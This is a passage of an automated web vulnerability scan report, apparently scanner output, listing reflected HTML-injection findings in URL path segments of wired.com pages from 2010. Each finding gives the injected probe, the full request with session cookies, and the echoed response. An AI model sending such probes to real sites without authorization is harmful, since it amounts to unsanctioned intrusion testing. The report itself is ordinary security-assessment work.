Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:49 GMT
Date: Sun, 21 Nov 2010 23:09:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese5c14"><a>76302bf60a4 c_news">
...[SNIP]...

1.258. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1119

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b016"><a>8b57ac5dea6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news4b016"><a>8b57ac5dea6/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:07 GMT
Date: Sun, 21 Nov 2010 23:10:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news4b016"><a>8b57ac5dea6">
...[SNIP]...

1.259. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1127

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d4ab"><a>01007bb9cc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science9d4ab"><a>01007bb9cc7/discoveries/news/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:37 GMT
Date: Sun, 21 Nov 2010 23:09:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science9d4ab"><a>01007bb9cc7 ss_discoveries c_news">
...[SNIP]...

1.260. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1127

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a068"><a>8c766f25078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries5a068"><a>8c766f25078/news/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:03 GMT
Date: Sun, 21 Nov 2010 23:10:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries5a068"><a>8c766f25078 c_news">
...[SNIP]...

1.261. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1127

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d5e"><a>47d8c564ba0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news70d5e"><a>47d8c564ba0/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:24 GMT
Date: Sun, 21 Nov 2010 23:10:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news70d5e"><a>47d8c564ba0">
...[SNIP]...

1.262. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/wiredscience

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58f65"><a>a1751845344 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science58f65"><a>a1751845344/discoveries/news/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:23 GMT
Date: Sun, 21 Nov 2010 23:09:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science58f65"><a>a1751845344 ss_discoveries c_news">
...[SNIP]...

1.263. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/wiredscience

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995c5"><a>fe13073f8eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries995c5"><a>fe13073f8eb/news/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:40 GMT
Date: Sun, 21 Nov 2010 23:09:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries995c5"><a>fe13073f8eb c_news">
...[SNIP]...

1.264. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/wiredscience

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9994"><a>6e128528801 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newse9994"><a>6e128528801/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:58 GMT
Date: Sun, 21 Nov 2010 23:09:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newse9994"><a>6e128528801">
...[SNIP]...

1.265. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/12/dayintech_1217

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7bd"><a>1e8eec37d12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencebb7bd"><a>1e8eec37d12/discoveries/news/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:07 GMT
Date: Sun, 21 Nov 2010 23:11:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencebb7bd"><a>1e8eec37d12 ss_discoveries c_news">
...[SNIP]...

1.266. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/12/dayintech_1217

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d62a"><a>5c65a610 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries6d62a"><a>5c65a610/news/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries6d62a"><a>5c65a610 c_news">
...[SNIP]...

1.267. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/12/dayintech_1217

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43dd8"><a>9084cb4edf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news43dd8"><a>9084cb4edf/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:33 GMT
Date: Sun, 21 Nov 2010 23:11:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news43dd8"><a>9084cb4edf">
...[SNIP]...

1.268. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/02/dayintech_0226

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266e8"><a>afe4e6938d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science266e8"><a>afe4e6938d/discoveries/news/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:08 GMT
Date: Sun, 21 Nov 2010 23:12:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science266e8"><a>afe4e6938d ss_discoveries c_news">
...[SNIP]...

1.269. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/02/dayintech_0226

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1030"><a>70ba086e197 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesb1030"><a>70ba086e197/news/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:25 GMT
Date: Sun, 21 Nov 2010 23:12:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesb1030"><a>70ba086e197 c_news">
...[SNIP]...

1.270. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/02/dayintech_0226

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59c5e"><a>b29ca90e37a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news59c5e"><a>b29ca90e37a/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:37 GMT
Date: Sun, 21 Nov 2010 23:12:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news59c5e"><a>b29ca90e37a">
...[SNIP]...

1.271. http://www.wired.com/science/discoveries/news/2008/03/dayintech_0321 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/03/dayintech_0321

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag a